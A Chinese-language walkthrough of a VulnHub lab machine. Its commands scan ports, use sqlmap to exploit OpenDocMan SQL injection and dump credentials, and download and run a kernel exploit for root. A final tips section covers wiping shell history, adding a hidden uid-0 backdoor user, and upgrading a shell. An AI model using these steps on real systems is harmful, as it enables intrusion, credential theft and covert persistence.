Linux滲透測試
前言
最近發現了一個不錯的靶場,裡面各種滲透測試的虛擬機器,大家可以下載進行嘗試學習。還有就是一個漏洞利用存檔,可以找到很多我們可以利用的學習的東西。
靶場:
https://www.vulnhub.com
漏洞利用存檔:
https://www.exploit-db.com
0x01 資訊蒐集
首先就是確定我們靶機的目標
nmap -sP -T5 192.168.0.1/24
通過前面的步驟,我們對目標進行具體的埠掃描以及作業系統識別,發現開啟有80,22以及6667埠。
nmap -sV -p- -A -O -T4 192.168.0.170
目錄掃描 繼續對目標進行敏感目錄掃描,御劍等工具都可以。這裡我使用KALI的nikto
以及dirb
命令進行簡單的目錄掃描。
nikto -host http://192.168.0.170
或者
dirb http://192.168.0.170
0x02 漏洞發現
訪問IP之後的頁面,發現並沒有什麼特別的地方,於是只能檢視原始碼,點選超連結進行檢視。
在連結的地方竟然發現了祕密的地方,於是訪問之
此處是一個登入介面,我們可以嘗試註冊一個使用者進行登入,但只是一個遊客的形式。
我們註冊一個使用者進行登入,還有有很多功能的,於是可以進行更多的嘗試。
在下面發現OpenDocMan v1.2.7, OpenDocMan是一個功能完整的基於Web的文件管理系統(DMS),於是找找OpenDocMan v1.2.7所公佈的一些可以利用的漏洞。
現可以利用的好幾個漏洞,於是先行嘗試sql注入
0x03 漏洞利用
經過簡單的測試發現
http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user
處確實注入。
是直接拿出神器Sqlmap進行注入。
sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value --dbs
經過常見的那幾個命令我們可以成功的拿到登入名和密碼。
sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs --tables
sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_admin --columns
發現admin表裡面沒有資訊,只能從user表裡面提取資訊。sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user --columns`
sqlmap.py -u "http://192.168.0.170/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user -C "username,password" --dump
我們可以看到已經獲取到了資料庫的使用者名稱和密碼,直接MD5解密就可以ssh登入伺服器。使用者名稱webmin
,密碼b78aae356709f8c31118ea613980954b
,明文為webmin
0x04 許可權提升
經過前面埠掃描可以發現,22埠發放著,可以進行ssh連線。
ssh webmin@192.168.0.170
檢視許可權發現是普通使用者的許可權,所以得繼續進行提權操作。獲取到低許可權SHELL後我們通常做下面幾件事:
檢測作業系統的發行版本
檢視核心版本
檢測當前使用者許可權
列舉Suid檔案
檢視已經安裝的包,程式,執行的服務,過期版本的有可能有漏洞
檢視系統的版本號資訊
lsb_release -a
檢視系統核心資訊
uname -r
我們可以看到此作業系統採用的是Ubuntu 14.04.4 LTS,核心版本是3.13.0-24-generic,首先想到的就是去漏洞庫尋找有沒有可以用的exploit。
下載漏洞exploit
wget https://www.exploit-db.com/download/37292mv 37292 shell.cgcc -o shell shell.c./shell
附Linux滲透小技巧:
bash去掉history記錄 export HISTSIZE=0 export HISTFILE=/dev/null
Linux新增uid為0的使用者 useradd -o -u 0 cnbird
可以翻下 mysql_history .bash_history
ls -al 看下root目錄下都有什麼隱藏目錄 例如 .ssh .vnc 等
可以看下 .ssh/下面的ssh連線記錄等,也可以看下全域性變數檔案什麼的
通過webshell反彈shell回來之後獲取真正的ttyshell
python -c 'import pty; pty.spawn("/bin/sh")'
相關文章
- linux滲透測試後續指南Linux
- linux滲透測試技巧2則Linux
- 滲透測試是否需要學習LinuxLinux
- 滲透測試會用到哪些工具?滲透測試教程
- 什麼是滲透測試?為什麼要做滲透測試?
- 什麼是滲透測試?滲透測試分類方式有哪些?
- 什麼是滲透測試?滲透測試分為哪幾類?
- 滲透測試怎麼做?滲透測試的步驟有哪些?
- 你真的瞭解“滲透測試”嗎?滲透測試有何作用?
- kali linux 2.0 web 滲透測試 電子書LinuxWeb
- Kali linux滲透測試系列————28、Kali linux 滲透攻擊之社會工程學攻擊Linux
- 滲透測試報告測試報告
- 滲透測試之nmap
- 【滲透測試】Vulnhub DarkHole
- 滲透測試什麼?滲透測試具體操作流程是什麼
- 網路安全滲透測試的型別!滲透測試入門教程型別
- 什麼是滲透測試?滲透測試培訓班如何選擇?
- 什麼是滲透測試?滲透測試的服務方式有哪些?
- metasploit滲透測試筆記(內網滲透篇)筆記內網
- 什麼是滲透測試?網站有必要進行滲透測試嗎?網站
- 滲透測試是什麼?滲透測試三種分類主要包括哪些?
- 滲透測試技巧總結
- 網路安全滲透測試
- 滲透測試-資訊收集
- GraphQL滲透測試詳解
- 滲透測試------資訊收集
- Burpsuite 滲透測試工具使用UI
- 滲透測試實驗二
- 物理滲透測試基礎
- 【滲透測試】Vulnhub Hackable II
- Web 端滲透測試初探Web
- 滲透測試之域名收集
- 滲透測試——資訊收集
- FLUXION參考滲透測試UX
- beescms網站滲透測試網站
- [雪峰磁針石部落格]滲透測試簡介1滲透測試簡介
- Kali Linux滲透測試實戰 第一章Linux
- 安全測試和滲透測試的區別